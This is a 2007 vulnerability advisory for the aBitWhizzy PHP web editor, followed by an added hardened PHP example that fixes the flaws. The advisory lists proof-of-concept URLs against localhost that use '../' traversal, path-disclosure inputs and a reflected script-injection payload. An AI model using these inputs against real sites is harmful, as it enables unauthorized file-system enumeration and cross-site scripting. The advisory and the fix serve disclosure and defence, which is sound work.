abitwhizzy-traverse.txt

Posted on 29 March 2007

################################################
aBitWhizzy traversal folder enumeration and XSS

vendor url: http://www.unverse.net/abitwhizzy/
Advisory: http://lostmon.blogspot.com/2007/03/abitwhizzy-traversal-folder-enumeration.html
vendor notify: YES
exploit include: YES
################################################

aBitWhizzy is a PHP script that uses whizzywig.js to create and edit web pages through a WYSIWYG interface, right through your browser. Now your site can be updated by people with no knowledge of HTML, FTP or AIG (Abbreviations In General).

aBitWhizzy contains a flaw that allows remote traversal and arbitrary folder enumeration. The flaw exists because the application does not validate the 'd' variable upon submission to the 'whizzylink.php', 'whizzypic.php', 'whizzery/whizzypic.php' and 'whizzery/whizzylink.php' scripts. This could allow a remote user to create a specially crafted URL containing '../' directory traversal sequences to view the folder structure of the target system with the privileges of the web service. The same input validation error also permits cross-site scripting style attacks and full path disclosure.

###################
VERSIONS
###################

Unknown version of aBitWhizzy

##################
SOLUTION
##################

No solution was available at this time !!

######################
TIMELINE
######################

discovered: 25-03-2007
vendor notify: 25-03-2007
vendor response: ---------
Private Disclosure: 25-03-2007
public disclosure: 27-03-2007

#######################
Examples
#######################

Path disclosure:

http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='

Folder enumeration:

http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings

Cross Site Scripting:

http://localhost/abitwhizzy/whizzery/whizzypic.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT>
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=/../../../../../../../Documents%20and%20Settings"><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT>
http://localhost/abitwhizzy/whizzypic.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT>
http://localhost/abitwhizzy/whizzylink.php?d=../../../../../../../Documents%20and%20Settings"><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT>

###########################
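The three problems the advisory lists (traversal via an unchecked 'd' value, reflected XSS from echoing that value back, and full path disclosure through PHP warnings) all come from the same missing validation, so one hardened endpoint closes all of them. The script below is an added example written for this page; it is not aBitWhizzy's own code, and the base directory (an 'uploads' tree next to the script), the helper names resolve_under_base() and h(), and the error text are assumptions.

```php
<?php
// Added example, not part of aBitWhizzy: a hardened stand-in for a folder
// listing endpoint that, like whizzylink.php / whizzypic.php, takes the
// folder to show in the 'd' query parameter.
declare(strict_types=1);

// Path disclosure fix: PHP warnings must never reach the client, because
// they carry the absolute filesystem path of the script.
ini_set('display_errors', '0');

/**
 * Traversal fix: resolve the user-supplied name against $base and return the
 * canonical absolute path, or null if it does not exist or escapes $base.
 */
function resolve_under_base(string $base, string $userDir): ?string
{
    $baseReal = realpath($base);
    if ($baseReal === false) {
        return null;
    }
    // realpath() would silently stop at a NUL byte, so reject it first.
    if (strpos($userDir, "\0") !== false) {
        return null;
    }
    // Always join below $base; a leading '/' in $userDir cannot re-root it.
    $candidate = realpath($baseReal . DIRECTORY_SEPARATOR . $userDir);
    if ($candidate === false || !is_dir($candidate)) {
        return null;
    }
    // After canonicalisation ('..' and symlinks resolved) the result must be
    // $base itself or start with "$base/".
    $prefix = rtrim($baseReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($candidate !== $baseReal && strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

/** XSS fix: escape every value before it is placed into HTML text or an attribute. */
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

$base = __DIR__ . '/uploads';            // assumed: the only tree users may browse
$d    = (string) ($_GET['d'] ?? '');     // the parameter the advisory describes

$dir = resolve_under_base($base, $d);
if ($dir === null) {
    http_response_code(400);
    // Generic message: the rejected value is not echoed back and no path is shown.
    echo '<p>Invalid folder.</p>';
    exit;
}

// Only the path relative to $base is ever shown; the absolute path stays server-side.
$shown = ltrim(substr($dir, strlen(realpath($base))), DIRECTORY_SEPARATOR);
echo '<h2>Folder: ' . h($shown === '' ? '/' : $shown) . '</h2>' . "\n<ul>\n";
foreach (scandir($dir) as $entry) {
    if ($entry === '.' || $entry === '..') {
        continue;
    }
    $next = $shown === '' ? $entry : $shown . '/' . $entry;
    // The link carries only the relative name, so the same check runs on the
    // next request; both the href and the visible text are escaped.
    echo '<li><a href="?d=' . h(rawurlencode($next)) . '">' . h($entry) . "</a></li>\n";
}
echo "</ul>\n";
```

With this in place a request such as d=../../../../etc canonicalises to a path outside the base tree and is rejected with a generic 400, d=' produces no warning output because display_errors is off, and a value ending in "><SCRIPT>... is never reflected, so there is nothing for the browser to execute. The prefix comparison is done on the realpath() result rather than on the raw string because '..' segments, double slashes and symlinks are only meaningful after canonicalisation.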
